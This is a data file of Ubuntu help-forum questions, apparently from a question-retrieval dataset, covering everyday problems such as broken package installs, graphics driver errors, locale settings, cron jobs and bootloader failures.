501068	heroes of newearth execution error	when i launch hon from dash it shows nothing . when i navigate to ~/hon and run sh hon.sh i get the following output : warning : the vad has been replaced by a hack pending a complete rewrite x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 136 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 22 current serial number in output stream : 22 how can i fix this ? ( lenovo g550 )
501069	file manager does n't remember list preference	on my ubuntu 14.04 virtual machine ( on vmware player ) , i have set my preference in the file manager to `` view items as a list '' ( click image to enlarge ) : but every time if i start up my virtual machine and open my file manager , i get the grid and not the list . how can i make sure that ubuntu remembers my preference and always shows the list ?
501076	upgrade from 12.10 to 14.04 directly from ubuntu or clean install ?	i am currently using ubuntu 12.10 i386 . i was disappointed as it was unable to install any software , get update or upgrade . in a question in askubuntu , i was told to install ubuntu 14.04.and i am currently downloading the ubuntu gnome 14.04 desktop amd 64 via transmission client . i 've used windows for long and i know i ca n't upgrade from a 32 bit to 64 bit . the ubuntu that i use now is 32 bit 12.10 so can i upgrade directly to ubuntu 14.04 from ubuntu or do i have to clean install it ? if i can upgrade from this without losing files , please tell me how ?
501080	unable to remove domain name from 14.04	i have a domain called `` csez.testcorp.com '' . i have created a user called `` admin '' . but in terminal it appears as `` testcorp\admin @ admin : ~ $ '' i want to remove the testcorp in front of the domain user name is it possible to remove ?
501082	photo search app , ubuntu 14.04	i need an app that searches for a photo in a given directory based on similarity . i found a lot of applications that find duplicate photos but i need to do a couple of hundred searches like these every day . what i used to use i windows is dupdetector but it does n't run with wine . thanks .
501083	will it be harmful if we install windows 8/	i have a dell latitude 3540 ubuntu pre installed . as many of us suffered a audio fail includes not working of speakers . is it because i had installed windows 8 or something else ? and how can i install again or recover ubuntu without disc ?
501086	xinit fails on ubuntu server 14.04 lts	i need to run on my server application with gui . the only way to connect to the server is via ssh . so what i have already have done is sudo apt-get install xosview xosview is simple program with nerdy system monitoring bars , that requires gui . this have installed all dependencies and by using ssh -y login.host and then xosview i can display remotely my nerdy bars . but that what is not working is : i try to start the same way my desired application , and after seeing splash picture , i get a windowed message : error initializing opengl : x server is missing opengl glx extension could n't configure togl widget and in terminal : xlib : extension `` glx '' missing on display `` localhost:10.0 '' . and here is output of xinit command : x.org x server 1.15.1 release date : 2014-04-13 x protocol version 11 , revision 0 build operating system : linux 3.2.0-37-generic x86_64 ubuntu current operating system : linux troll-0 3.13.0-32-generic # 57-ubuntu smp tue jul 15 03:51:08 utc 2014 x86_64 kernel command line : boot_image=/boot/vmlinuz-3.13.0-32-generic root=uuid=e07be4a8-55b3-4e02-829e-125699107c15 ro build date : 16 april 2014 01:36:29pm xorg-server 2:1.15.1-0ubuntu2 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.30.2 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : tue jul 22 14:46:18 2014 ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' initializing built-in extension generic event extension initializing built-in extension shape initializing built-in extension mit-shm initializing built-in extension xinputextension initializing built-in extension xtest initializing built-in extension big-requests initializing built-in extension sync initializing built-in extension xkeyboard initializing built-in extension xc-misc initializing built-in extension security initializing built-in extension xinerama initializing built-in extension xfixes initializing built-in extension render initializing built-in extension randr initializing built-in extension composite initializing built-in extension damage initializing built-in extension mit-screen-saver initializing built-in extension double-buffer initializing built-in extension record initializing built-in extension dpms initializing built-in extension present initializing built-in extension dri3 initializing built-in extension x-resource initializing built-in extension xvideo initializing built-in extension xvideo-motioncompensation initializing built-in extension selinux initializing built-in extension xfree86-vidmodeextension initializing built-in extension xfree86-dga initializing built-in extension xfree86-dri initializing built-in extension dri2 loading extension glx ( ee ) fatal server error : ( ee ) no screens found ( ee ) ( ee ) please consult the the x.org foundation support at http : //wiki.x.org for help . ( ee ) please also check the log file at `` /var/log/xorg.0.log '' for additional information . ( ee ) ( ee ) server terminated with error ( 1 ) . closing log file . xinit : giving up xinit : unable to connect to x server : connection refused xinit : server error my question is : what may i do to run any gui application remotely via ssh ? vnc is not a solution this case .
501091	command pg_dump not found ?	i was going to make a backup in a server and i got the error : pg_dump command not found i thought that if you had postgres installed , it worked . what i have to do to `` install '' it ? because i do not think that it is possible with apt-get or aptitude .
501094	two black screens on triple monitor setup with fglrx and fglrx-updates	i am running ubuntu 14.04 lts with gnome 3 ( but this also happens with unity ) . however , once i login , only the center monitor ( primary ) will work . the other two monitors are black , but they do show my cursor , additionally windows appear to be popping up on them ( e.g.- when i configure displays , the confirm window pops up on a screen i can not see the rendering of , also when i restore my firefox windows , they pop up on those screens ) . this issue is only happening with fglrx and fglrx-updates , when i switch to the open source driver , the issue does not appear , but i loose my 3 monitor setup .
501097	can not install any packages	whenever i try to install any new package i get the same error results : - sudo apt-get install gnome-system-monitor reading package lists ... done building dependency tree reading state information ... done gnome-system-monitor is already the newest version . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : wvdial : i386 : depends : libuniconf4.6 : i386 but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . ===================== and when i tried 'apt-get -f install' results : - muhammad @ mo7sin : $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libuniconf4.6 : i386 the following new packages will be installed : libuniconf4.6 : i386 0 upgraded , 1 newly installed , 0 to remove and 68 not upgraded . 1 not fully installed or removed . need to get 0 b/133 kb of archives . after this operation , 439 kb of additional disk space will be used . do you want to continue ? [ y/n ] y ( reading database ... 240834 files and directories currently installed . ) preparing to unpack ... /libuniconf4.6_4.6.1-7_i386.deb ... unpacking libuniconf4.6 ( 4.6.1-7 ) ... dpkg : error processing archive /var/cache/apt/archives/libuniconf4.6_4.6.1-7_i386.deb ( -- unpack ) : trying to overwrite '/etc/uniconf.conf ' , which is also in package libuniconf4.4 4.4.1-0.2ubuntu2 errors were encountered while processing : /var/cache/apt/archives/libuniconf4.6_4.6.1-7_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ====================== also i removed '/etc/uniconf.conf ' & /var/cache/apt/archives/libuniconf4.6_4.6.1-7_i386.deb files manually i ran 'sudo apt-get autoclean ' & 'sudo apt-get clean ' but nothing solved the problem , what else can i do ?
501099	modules installation for python3.3	i 'm trying to install the biopython module on my ubuntu 12.04 lts machine ( 64x ) . i first upgraded to python3.3 by installing from source ( biopython does not support other versions ) , that seems ok . however , i installed some modules using the sudo apt-get install python-module command but i ca n't call them from a python shell : dovah @ asusx501a : ~ $ python3.3 python 3.3.5 ( default , mar 12 2014 , 02:09:17 ) [ gcc 4.6.3 ] on linux type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . > > > from biopython import * traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > importerror : no module named 'biopython' > > > from bio import * # # as suggested in http : //biopython.org/dist/docs/api/module-tree.html traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > importerror : no module named 'bio' as you can see , the modules are installed : dovah @ asusx501a : ~ $ sudo apt-get install python-biopython reading package lists ... done building dependency tree reading state information ... done python-biopython is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . and so is biopython ( quite strange though : line 14 says biopython-1.64-py2.7-linux-x86_64.egg so best hit was found for version 2.7 , not 3.3 ) : dovah @ asusx501a : ~ $ sudo easy_install -f http : //biopython.org/dist/ biopython searching for biopython reading http : //biopython.org/dist/ best match : biopython 1.64 downloading http : //biopython.org/dist/biopython-1.64.zip processing biopython-1.64.zip writing /tmp/easy_install-v5ljzz/biopython-1.64/setup.cfg running biopython-1.64/setup.py -q bdist_egg -- dist-dir /tmp/easy_install-v5ljzz/biopython-1.64/egg-dist-tmp-trugjh warning : no previously-included files matching '.cvsignore ' found under directory '*' warning : no previously-included files matching '*.pyc ' found under directory '*' zip_safe flag not set ; analyzing archive contents ... bio.entrez.parser : module references __path__ adding biopython 1.64 to easy-install.pth file installed /usr/local/lib/python2.7/dist-packages/biopython-1.64-py2.7-linux-x86_64.egg processing dependencies for biopython finished processing dependencies for biopython are modules specific for a given python version ? is the system still stuck on python 2.7 ? obviousely i ca n't simply remove 2.7 unless i want to mess up my whole os . thank you in advance for your help . edit numpy successfully installed using : sudo apt-get install python3-numpy
501101	where does banshee store id3 tags	i would like to know if there is a way that i can save all my album art in banshee in a folder , i 'm very particular about the look and feel of my media player
501103	add a dash / lens to gnome flashback ( 14.04 )	i 've installed gnome flashback ( compiz ) because i need window control buttons on the right hand side . really , the only thing i 'm missing is a dash / lens . i 'd like to be able to press the `` super '' key , type `` firef '' , hit enter , and have firefox launch . is there any plugin i can use ? i read that unity 2d could do this - but it does n't seem to be included in 14.04
501104	how to connect to sql server 2008 ?	i am using ubuntu 12.04 , and i have a microsoft sql server 2008 which is running on a windows server 2008 on port 1433 , but windows server 2008 is virtualized it is running on vmware and further this vmware is running on windows 7 , i want to connect to sql server 2008 thorugh my ubunut terminal , i just want to be sure that i am able connect to mysql server so that i can start developing my python program which will access sqlserver database , i have tried telnet command but i get error message , is there any way so that i can be sure that i am able to connect to sql server .
501105	file ownership in ftp client displays id instead of name	today i 'm setting up my first vps â ubuntu 14.04 on digital ocean . the set up shows owner and group id instead of name . it 's not ftp client 's settings . it happens only for my new vps sever . maybe for someone my `` situation '' is even better , but i 'm used to `` names '' instead of `` ids '' . can i change it somewhere ? update : i noticed that it happens only for usesrs with `` chrootdirectory '' in sshd_config . update # 2 : i found in open ssh manual , that `` the chrootdirectory must contain the necessary files and directories to support the users ' session. '' . maybe there is n't file that converts user id to user name ? is there a command ( file ) for that in ubunutu ?
501106	monitor out of frequency when installing os from dvd	i am trying to install ubuntu 14.04 on my friend 's pc which has crt 14 '' lg monitor but when it boots form dvd , i am getting following error : also when using option `` try ubuntu '' , getting same error ! now how to solve it ? and how to change screen resolution permanently from disk to install and work on ubuntu 14.04
501113	how do i install xfreerdp 11 on to ubuntu 12.04	i am looking for a sure fire way of installing xfreerdp 11 on the ubuntu 12.04 environment as my attempts have failed so far .
501115	make command not working error 2	i was trying to install realtek_rts5229_linux_driver_v1.07 which i downloaded from [ here ] [ 1 ] when i run the make command i get the following error : - make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-32-generic' make : *** [ linux ] error 2 i have 64 bit ubuntu 12.04 lts installed .
501120	deploy hadoop with juju	why after to run the command : juju deploy hadoop hadoop-master -- to 7 obtain this error error can not upload charm to provider storage : gomaasapi : got error back from server : 500 internal server error ( < ! doctype html public `` -//ietf//dtd html 2.0//en '' > < html > < head > < title > 500 internal server error < /title > < /head > < body > < h1 > internal server error < /h1 > < p > the server encountered an internal error or misconfiguration and was unable to complete your request. < /p > < p > please contact the server administrator at webmaster @ localhost to inform them of the time this error occurred , and the actions you performed just before this error. < /p > < p > more information about this error may be available in the server error log. < /p > < hr > < address > apache/2.4.7 ( ubuntu ) server at 1.1.1.10 port 80 < /address > < /body > < /html > ) thanks
501124	setup restarts the laptop and then restarts the installation all over and over again ?	i am installing ubuntu 14.04 lts using a usb
501129	recived this error in grub after attempting to dual-boot windows 8 and ubuntu 14.04 error : file '/grub/i386-pc/normal.mod ' not found	so i just received my laptop ( lenovo e545 ) yesterday and i wanted to dual boot ubuntu 14.04 alongside windows 8 . i booted into the ubuntu disc and selected install ubuntu alongside windows 8 . it installed fine but grub was not there after turning on my computer . so i deleted the ubuntu partition from windows disc management . from there i followed this tutorial http : //www.everydaylinuxuser.com/2014/05/install-ubuntu-1404-alongside-windows.html to try and install ubuntu again . all the steps went as expected so when i was done i rebooted . grub was chosen as the bootloader but it gave me the error error : file '/grub/i386-pc/normal.mod ' not found . what do i do ?
501133	cron does not work	i read about cron . i edited it by running crontab -e and i added this line : * * * * * php /var/www/createfile.phpwhen i run ls /tmp/ i do not see any file create by my php script . why does not it work ? when i run php /var/www/createfile.php it works fine , however ( the effect is the creation of a text file in /tmp/ i changed the command to : /usr/bin/php /var/www/createfile.php > /tmp/createfile.log 2 > & 1 as jos suggested me below . when i run cat /tmp/createfile.log i get this : python can not open file 'createfile.py ' : [ errno 2 ] no such file or directory i used the full path to createfile.py as jos suggested me in createfile.php now i get this error : sh : nmap not found 0sh : nmap not found
501141	problem with webmin ( dns )	i setup slave dns server for my master , i configured everything , all domains was transfered to the slave server , i can add new domain , edit existing domain , but in the logs i 've got problems . there is thousands of this logs : zone domain.com/in : refresh : could not set file modification time of '/var/lib/bind/domain.com.hosts ' : permission denied how i can solve this problem ? sometimes i have to add more then one a record to transfer the domain to slave server . thanks
501142	error msg installing and updating skype in ubuntu 14.04	problem solved ! thanks ! i get an error msg when i try to install skype . w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ trusty/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_trusty_partner_binary-i386_packages ) w : you may want to run apt-get update to correct these problems kp @ kp-satellite-c660d : ~ $ apt-get update e : could not open lock file /var/lib/apt/lists/lock - open ( 13 : permission denied ) e : unable to lock directory /var/lib/apt/lists/ e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? i have just updated to ubuntu 14.04 and had error msg 's during upgrade . i 'm a newbie and not good at this.. can anyone help ? many thanks
501145	key repeating consistently gets interrupted	i am using xubuntu 12.04 64bit on an acer travelmate 5742z laptop . scenario : holding the key sss expected output : ssssssssssssssssssssssssssssssssssssssssssssssssss ... ssssssssssssssss actual output : sss i will get the same amount of letters , no matter how long i press the key . it appears as if i released the key , even though i did n't . this happens consistently , every time i try it and with every key on my keyboard . in settings - > settings manager - > keyboard , key repetition is enabled . fiddling with the sliders only changes the amount of letters appearing before it will stop , for example , if i decrease the repeat delay i might get this output in above scenario : ssssssssssssssss . i also tried to toggle the repeat function , which did not solve the problem . if i am typing in a terminal ( ctrl+alt+f1-f6 ) , this problem does not occur and the keyboard behaves as expected . note : together with this problem , selecting text with the mouse would be interrupted as well . so i only could select a text for a specific time , after that time it would appear as if i released the mouse button , even though i did n't . for some reason , this problem is now gone . update i now used xev to further analyse the problem . keeping s pressed will create the following event log : keymapnotify event , serial 34 , synthetic no , window 0x0 , keys : 84 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 keypress event , serial 34 , synthetic no , window 0x2200001 , root 0xae , subw 0x0 , time 5829250 , ( 356 , -6 ) , root : ( 965,449 ) , state 0x10 , keycode 39 ( keysym 0x73 , s ) , same_screen yes , xlookupstring gives 1 bytes : ( 73 ) `` s '' xmblookupstring gives 1 bytes : ( 73 ) `` s '' xfilterevent returns : false ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .. here i deleted ~25 keypress events that look all similar to the others ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .. keypress event , serial 34 , synthetic no , window 0x2200001 , root 0xae , subw 0x0 , time 5829488 , ( 356 , -6 ) , root : ( 965,449 ) , state 0x10 , keycode 39 ( keysym 0x73 , s ) , same_screen yes , xlookupstring gives 1 bytes : ( 73 ) `` s '' xmblookupstring gives 1 bytes : ( 73 ) `` s '' xfilterevent returns : false focusout event , serial 34 , synthetic no , window 0x2200001 , mode notifygrab , detail notifyancestor focusin event , serial 34 , synthetic no , window 0x2200001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 34 , synthetic no , window 0x0 , keys : 2 0 0 0 4294967168 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 keyrelease event , serial 34 , synthetic no , window 0x2200001 , root 0xae , subw 0x0 , time 5830220 , ( 356 , -6 ) , root : ( 965,449 ) , state 0x10 , keycode 39 ( keysym 0x73 , s ) , same_screen yes , xlookupstring gives 1 bytes : ( 73 ) `` s '' xfilterevent returns : false clientmessage event , serial 34 , synthetic yes , window 0x2200001 , message_type 0x14f ( wm_protocols ) , format 32 , message 0x14d ( wm_delete_window ) why is there an focusout event followed by an focusin event ? i disabled my touchpad and i am not pressing any other key or mouse button while holding the s key .
501148	corrupt postfix installv [ solved ]	i accidently removed some files that postfix needs and now it will not install or uninstall have tried : sudo apt-get purge postfix sudo apt-get remove postfix sudo apt-get upgrade sudo apt-get install postfix sudo apt-get autoremove postfix sudo apt-get remore -- auto-remove postfix no matter what i do i always recieve the following error : root @ gitlab : / # sudo apt-get remove postfix reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : postfix 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 3,361 kb disk space will be freed . do you want to continue ? [ y/n ] y ( reading database ... 99428 files and directories currently installed . ) removing postfix ( 2.11.0-1 ) ... invoke-rc.d : unknown initscript , /etc/init.d/postfix not found . dpkg : error processing package postfix ( -- remove ) : subprocess installed pre-removal script returned error exit status 100 /var/lib/dpkg/info/postfix.postinst : 13 : . : ca n't open /usr/share/postfix/postinst.functions dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : postfix e : sub-process /usr/bin/dpkg returned an error code ( 1 ) edit : followed this guide and it was fixed : http : //blog.bodhizazen.net/linux/apt-get-how-to-fix-very-broken-packages/
501152	recovery option not showing up in grub menu	i installed ubuntu 12.04 lts and i remember i made the recovery partition but grub not showing recovery option i made recovery partition in /dev/sda2 ntfs and the label is hp_recovery
501153	find out what php librariers are installed	i really hope this question is no duplicate , but i just ca n't find an answer . i 'm new to linux and php . i have a manual telling me that i need php with certain libraries installed . is there a command to list all the installed php libraries ? how do i know if i have them installed or not ? one would guess that should be an simple command to list them . it 's probably irrelevant to my question , but the needed modules are mysql , xml , mbstring , mcrypt , soap , ladp , gd and curl . thanks
501154	transfer music from iphone to ubuntu	ive got an iphone 5 running ios 7 . i want to transfer the music from the iphone to my ubuntu and be able to play them locally on my computer without plugging in my iphone . so , the simple question is , is it possible to tranfer music from ios 7.1 to ubuntu 14.04 running devices ( and i know that apple wont probably like me to ) ?
501157	can i add wordpress 3.9.1 from utopic to trusty	you may find this a silly idea but i was just wondering if it is possible to install wordpress 3.9.1 from utopic instead of the 3.8.2 version on trusty . the idea is to have a wp 3.9.1 setup with repository updates . is that possible ( without breaking the system ? )
501164	how to know the file system of my usb memory from the terminal ?	i have connected a usb memory to my pc . it has been automatically mounted and i can access it from /media/ ... . how can i know the file system of this memory from the terminal ?
501167	faillog - allowing a user read access for themselves	i 'm trying to get each user on my system permission to read their own number of failed login attempts . eg : faillog -u $ currentuser running this as any user except root gives me a 'permission denied' but if i relax permissions on the /var/log/faillog from 600 then it seems to break login for all users until i revert it back to 600 . in addition to this , i do n't really want a user to have access to everyone else login attempts . is there another way i can get failed login attempts ?
501168	winusb confused pendrive with external drive ?	mates , i was trying to make a windows bootable image on my flash memmory and seems that winusb confused my pendrive with my external hard drive . the thing is that i 've lost like 700gbs . the external drive appears like `` windows usb '' when mounted . and does n't mount at all on windows . can you help me with this ? thanks in advance !
501172	how to send files to a certain folder	i am using pcmanfm and i am trying to make it to where whenever i highlight a few files i can right-click and send them to a certain folder . or i could probably use xdotool but i do n't know how i would go about setting that up , any help ?
501173	make davfs2 accept wild card certificate ( webdav )	i have multiple servers that share files via webdav . the connections are secured with tls and the same wild card certificate on all servers . i have different subdomains pointing to the respective servers . however i ca n't get davfs2 to accept my wild card certificates , it keeps complaining : /sbin/mount.davfs : the server certificate does not match the server name so for example i have : servera.mydomain.com serverb.mydomain.com all have certificate that covers *.mydomain.com and a san for mydomain.com everything works fine of course if i use mydomain.com for webdav because that one is explicitly covered in the certificate . i could add all my subdomains as san 's to the certificate , but i ca n't keep reissuing certificates each time i put a machine up ( or take one down ) . so is there anyway to make davfs2 accept wildcard certificates ?
501174	how to perform a cpu/disk intensive operation without drastically affecting other processes ?	i am running a server on ubuntu 12.04 . the operation i 'm trying to perform is a git clone , as part of a new backup system i 'm implementing . the source and destination are both local , so there is no network activity involved in the clone . this server is hosting minecraft , and i would like to be able to do things like this in the background while the server is running . however , each time i attempt it , it locks up the server and kicks everyone off despite my best efforts to limit the impact on resource usage . here 's the command which i was sure would work : nice -n 19 ionice -c 3 git clone bukkit backup from what i 've read , this should give the process lowest cpu priority and `` idle only '' disk priority . however , it still has the same effect of locking up and timing out everyone connected to the minecraft server . to be clear , the git repository is not in the active server folder , so there is n't any kind of file-access conflict . i can give details on hardware specs if necessary . thanks .
501175	ca n't attach root screen	i 'm writing some scripts to automate running a minecraft server but i 'm having trouble with screen . i 'm running the server jar in a screen from a service but once i 'm logged in i can not reattach the screen . akbkuku @ s-d-ubuntu : ~ $ ps aux | grep minecraft-server root 1270 0.0 0.0 24208 1256 ? ss 07:46 0:00 screen -dms minecraft-server java -xms512m -xmx1g -jar ./minecraft-server.jar root 1272 0.8 5.5 3300368 453732 pts/0 ssl+ 07:46 0:24 java -xms512m -xmx1g -jar ./minecraft-server.jar akbkuku 14252 0.0 0.0 15952 924 pts/27 s+ 08:34 0:00 grep -- color=auto minecraft-server akbkuku @ s-d-ubuntu : ~ $ sudo screen -r minecraft-server there is no screen to be resumed matching minecraft-server . script code if it 'll help
501177	14.04 mime type `` png ''	error message clicking on nnn.png images ( and no image display ) : no default application found for the mime type image/x-apple-ios-png . open the `` file types and programs '' page in the control center to add one . this should work `` out of the box '' in 14.04 lts .
501180	i can not access the juju-gui even though i have installed it and it shows me service started	i can not access the juju-gui even though i have installed it and it shows me service started . i have installed it on the same maas server . it shows me agent state : started . the public address given is bjayg.maas i have used the internal ip address which already has a route added
501181	how to change/fix system 's locale when you setup in a language not official in your country ?	how do i set up a global locale for the computer ? i have recently installed kubuntu 14.04lts in english but since i am in spain , i chose spain as a country and then changed locale options so that i get all country specific configuration such as digit grouping , decimal separator , date format , etc . i also added the spanish language . now all applications complain that locale is wrong . check-language-support tells me i 'm using en_es.utf-8 as system 's locale , and that locale is indeed wrong , there is no locale for english language in spain . i tried using kubuntu 's country/region & language settings but it does n't fix it . i tried using export lang=en_gb.utf-8 and export lc_all=en_gb.utf-8 and then sudo dpkg-reconfigure locales and that caused check-language-support to say that i now have a correct configuration but if it is , it 's only in that konsole session . this problem also cauprevents konsole from showing unicode characters and i can not use dead keys or enter any 'international character ' such as ñ or ç ( those work on other applications such as firefox , that i 'm using to post this question ) . so the question is : how do i set up a global locale for the computer ? this is not a bug report , i will probably reinstall my computer eventually if i ca n't fix it . but i really want to know how i can perform this really basic task . thank you . check-language-support perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = `` en : es : en '' , lc_all = ( unset ) , lc_paper = `` en_es.utf-8 '' , lc_address = `` en_es.utf-8 '' , lc_monetary = `` en_es.utf-8 '' , lc_numeric = `` en_es.utf-8 '' , lc_telephone = `` en_es.utf-8 '' , lc_identification = `` en_es.utf-8 '' , lc_measurement = `` en_es.utf-8 '' , lc_time = `` en_es.utf-8 '' , lc_name = `` en_es.utf-8 '' , lang = `` en_es.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_collate to default locale : no such file or directory hunspell-en-ca libreoffice-help-en-gb libreoffice-l10n-en-gb libreoffice-l10n-en-za mythes-en-au wspanish content of /etc/default/locale lang= '' en_us.utf-8 '' lc_numeric= '' es_es.utf-8 '' lc_time= '' es_es.utf-8 '' lc_monetary= '' es_es.utf-8 '' lc_paper= '' es_es.utf-8 '' lc_name= '' es_es.utf-8 '' lc_address= '' es_es.utf-8 '' lc_telephone= '' es_es.utf-8 '' lc_measurement= '' es_es.utf-8 '' lc_identification= '' es_es.utf-8 '' locale locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory lang=en_es.utf-8 language=en : es : en lc_ctype= '' en_es.utf-8 '' lc_numeric=en_es.utf-8 lc_time=en_es.utf-8 lc_collate= '' en_es.utf-8 '' lc_monetary=en_es.utf-8 lc_messages= '' en_es.utf-8 '' lc_paper=en_es.utf-8 lc_name=en_es.utf-8 lc_address=en_es.utf-8 lc_telephone=en_es.utf-8 lc_measurement=en_es.utf-8 lc_identification=en_es.utf-8 lc_all= result of update-locale command : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = `` en : es : en '' , lc_all = ( unset ) , lc_paper = `` en_es.utf-8 '' , lc_address = `` en_es.utf-8 '' , lc_monetary = `` en_es.utf-8 '' , lc_numeric = `` en_es.utf-8 '' , lc_telephone = `` en_es.utf-8 '' , lc_identification = `` en_es.utf-8 '' , lc_measurement = `` en_es.utf-8 '' , lc_time = `` en_es.utf-8 '' , lc_name = `` en_es.utf-8 '' , lang = `` en_es.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) .
501182	how to tell cron to find paths to tools ?	is there a way to indicate to cron how/where to find ( paths to ) tools such as python , nmap , php and so on ? i ask this because when i schedule a job using crontab -e , i always need to specify the full path of python , nmap and whatever other tool i want to use .
501184	ralink rt3290 bluetooth not working	i was trying to install ralink rt3290 bluetooth driver which i downloaded from http : //s3.amazonaws.com/mtk.cfs/downloads/linux/-2012_0508_rt3290_linux_sta_v2.6.0.0.bz2 when i run the make command i get the following error : - make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-32-generic' make : * [ linux ] error 2 i have 64 bit ubuntu 12.04 lts installed .
501187	installing ubuntu from an external hard drive	so i 've been trying to install ubuntu for a while now with no success . i do n't have a thumb drive , and my computer does n't have a cd drive , but i have an external hard drive . i already went through the instructions at ubuntu 's site and when i got to the restart and hit f12 part , it gave me weird error messages like no texts ! . i decided to delete what i put on the hard drive and re-download it . that time it actually brought up a screen asking if i wanted to try ubuntu or install , or other options . but when i selected install ubuntu it just gave me a black screen with a blinking underscore in the upper left . i 'm assuming the problem must be the hard drive since i 'm pretty sure i downloaded the right things and took all the right steps that would apply to a usb drive . so since the only discrepancy is the fact that i 'm using an external hard drive , that has to be the problem , right ? is there anything i need to do to my hard drive to make it work , maybe reformat it ?
501188	installation qtsampleplayer ubuntu 14.04	i 'm new to linux so please accept my apologies if the question is trivial . i 'm trying to install qtsampleplayer under ubuntu 14.04 ( 32bit ) according to these instructions : prerequisite : libdash must be built as described in the previous section . sudo apt-add-repository ppa : ubuntu-sdk-team/ppa sudo apt-add-repository ppa : canonical-qt5-edgers/qt5-proper sudo apt-get update sudo apt-get install qtmultimedia5-dev qtbase5-dev libqt5widgets5 libqt5core5 libqt5gui5 libqt5multimedia5 libqt5multimediawidgets5 libqt5opengl5 libav-tools libavcodec-dev libavdevice-dev libavfilter-dev libavformat-dev libavutil-dev libpostproc-dev libswscale-dev cd libdash/libdash/qtsampleplayer mkdir build cd build wget http : //www.cmake.org/files/v2.8/cmake-2.8.11.2-linux-i386.sh chmod a+x cmake-2.8.11.2-linux-i386.sh ./cmake-2.8.11.2-linux-i386.sh ./cmake-2.8.11.2-linux-i386/bin/cmake ../ make ./qtsampleplayer but unfortunately during step 11 ( ./cmake-2.8.11.2-linux-i386/bin/cmake ../ ) i encountered an error : cmake error at /usr/lib/i386-linux-gnu/cmake/qt5gui/qt5guiconfig.cmake:27 ( message ) : the imported target `` qt5 : :gui '' references the file `` /usr/lib/i386-linux-gnu/libgl.so '' but this file does not exist . possible reasons include : the file was deleted , renamed , or moved to another location . an install or uninstall procedure did not complete successfully . the installation package was faulty and contained `` /usr/lib/i386-linux-gnu/cmake/qt5gui/qt5guiconfigextras.cmake '' installation was successful but under 12.04 . if anybody can help please help , thank you .
501189	upgrade 12.04 lts to 14.04 lts	i want to upgrade my ubuntu version 12.04 lts to 14.04 lts . is there a way that i can install it with fresh copy and a formatted partition ? ? ? i do n't want my other drives to get formatted . but just the drive that contains file system .
501197	use an older version of batman-adv on 14.04	i have a number of beaglebone black ( bbb ) boards running a batman-adv mesh network . the batman-adv version built into the bbb image ( kernel 3.8.13 ) is 2012.5.0 . my desktop and notebook clients all run newer kernels - eg . 3.13.0 which includes batman-adv version 2013.5.0 sadly , the batman-adv frame layout has changed inbetween those two versions , rendering the newer clients ' batman-adv mesh nodes incompatible with the bbb 's . upgrading the bbb mesh network is not feasible so i 'm looking for a solution on the desktop linux side : can i somehow build and load an older version of batman-adv as a stand-alone kernel module and override the driver that 's been compiled into the newer kernels when modprobing ? any help or pointers to information would be greatly appreciated !
501199	ibus not working in lubuntu	i install lubuntu few days ago and i tried to add my locale ( sinhala ) . by using command ibus-setup i got the ibus configuration window and then i add my locale . i can see the keyboard icon on the top bar and when i use key combination ctrl+space it change default english ( us ) to my locate . but that effects nothing . when i type all i get is english . i tried adding another locale and result is the same . i tried running im-switch -s ibus which gives a error like error : no configuration file `` ibus '' exists . error : no action taken . so i guess though ibus is running it is not set as the input method . can anyone give me a hand here .
501212	script for changing access rights of multiple files and directories ?	i want to create a script that changes the access rights for all files and folders in a specific directory tree . all users should have read and write access for all files and directories . does anyone have an idea about such a script can look like ? thanks in advance for any hint !
